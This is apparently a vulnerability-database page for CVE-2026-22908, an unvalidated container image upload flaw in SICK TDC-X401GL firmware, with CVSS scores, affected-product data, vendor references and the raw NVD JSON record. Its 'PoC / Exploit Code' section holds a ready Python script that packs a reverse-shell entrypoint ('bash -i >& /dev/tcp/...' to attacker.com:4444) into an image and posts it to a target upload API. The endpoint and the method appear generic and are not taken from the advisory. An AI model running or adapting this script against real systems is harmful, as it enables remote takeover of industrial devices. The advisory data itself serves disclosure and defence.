Security Vulnerability Report
CVE-2026-22908 CVSS 9.1 CRITICAL

CVE-2026-22908

Published: 2026-01-15 13:16:05
Last Modified: 2026-01-23 15:46:56

Description

Uploading unvalidated container images may allow remote attackers to gain full access to the system, potentially compromising its integrity and confidentiality.

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector (Secondary metric in the record)
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
CVSS Vector (Primary metric in the record)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:o:sick:tdc-x401gl_firmware:*:*:*:*:*:*:*:* - VULNERABLE (versions before 1.4.0, per versionEndExcluding in the record)
cpe:2.3:h:sick:tdc-x401gl:-:*:*:*:*:*:*:* - NOT VULNERABLE
Affected SICK product versions (refer to the official vendor advisory for the exact versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python

# CVE-2026-22908 PoC - Malicious Container Image Upload
# This PoC demonstrates the vulnerability of uploading unvalidated container images
import requests
import tarfile
import io

TARGET_URL = "https://target-system.com/api/container/upload"
ATTACKER_IP = "attacker.com"
ATTACKER_PORT = "4444"


def create_malicious_image():
    """Create a malicious container image with reverse shell payload"""
    # Create a minimal Dockerfile with reverse shell
    dockerfile_content = f'''
FROM alpine:latest
RUN apk add --no-cache bash nc curl
RUN echo "#!/bin/bash" > /entrypoint.sh
RUN echo "bash -i >& /dev/tcp/{ATTACKER_IP}/{ATTACKER_PORT} 0>&1" >> /entrypoint.sh
RUN chmod +x /entrypoint.sh
ENTRYPOINT ["/entrypoint.sh"]
'''
    # Create tar archive for container image
    image_tar = io.BytesIO()
    with tarfile.open(fileobj=image_tar, mode='w') as tar:
        # Add malicious Dockerfile
        info = tarfile.TarInfo(name="Dockerfile")
        info.size = len(dockerfile_content.encode())
        tar.addfile(info, io.BytesIO(dockerfile_content.encode()))
    return image_tar.getvalue()


def exploit():
    """Upload malicious container image to exploit CVE-2026-22908"""
    malicious_image = create_malicious_image()
    headers = {
        'Authorization': 'Bearer <valid_token>',
        'X-Image-Name': 'malicious-image:latest'
    }
    # Note: No validation is performed on the uploaded image
    response = requests.post(
        TARGET_URL,
        files={'image': ('malicious.tar', malicious_image, 'application/x-tar')},
        headers=headers,
        verify=False
    )
    return response.status_code, response.text


if __name__ == "__main__":
    print("[*] Exploiting CVE-2026-22908: Unvalidated Container Image Upload")
    status, resp = exploit()
    print(f"[*] Response Status: {status}")
    print(f"[*] Response: {resp}")

References

https://sick.com/psirt (Vendor Advisory)
https://www.cisa.gov/resources-tools/resources/ics-recommended-practices (US Government Resource)
https://www.first.org/cvss/calculator/3.1 (Not Applicable)
https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.json (Vendor Advisory)
https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.pdf (Vendor Advisory)
https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf (Product)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22908", "sourceIdentifier": "[email protected]", "published": "2026-01-15T13:16:05.400", "lastModified": "2026-01-23T15:46:56.290", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Uploading unvalidated container images may allow remote attackers to gain full access to the system, potentially compromising its integrity and confidentiality."}, {"lang": "es", "value": "Subir imágenes de contenedores no validadas puede permitir a atacantes remotos obtener acceso total al sistema, comprometiendo potencialmente su integridad y confidencialidad."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-266"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sick:tdc-x401gl_firmware:*:*:*:*:*:*:*:*", 
"versionEndExcluding": "1.4.0", "matchCriteriaId": "B95FBF38-3829-4FC4-BBFD-137B810FAA5A"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sick:tdc-x401gl:-:*:*:*:*:*:*:*", "matchCriteriaId": "9A95E220-0816-4885-AB7C-D0BB6F27DB7A"}]}]}], "references": [{"url": "https://sick.com/psirt", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.cisa.gov/resources-tools/resources/ics-recommended-practices", "source": "[email protected]", "tags": ["US Government Resource"]}, {"url": "https://www.first.org/cvss/calculator/3.1", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.json", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.pdf", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf", "source": "[email protected]", "tags": ["Product"]}]}}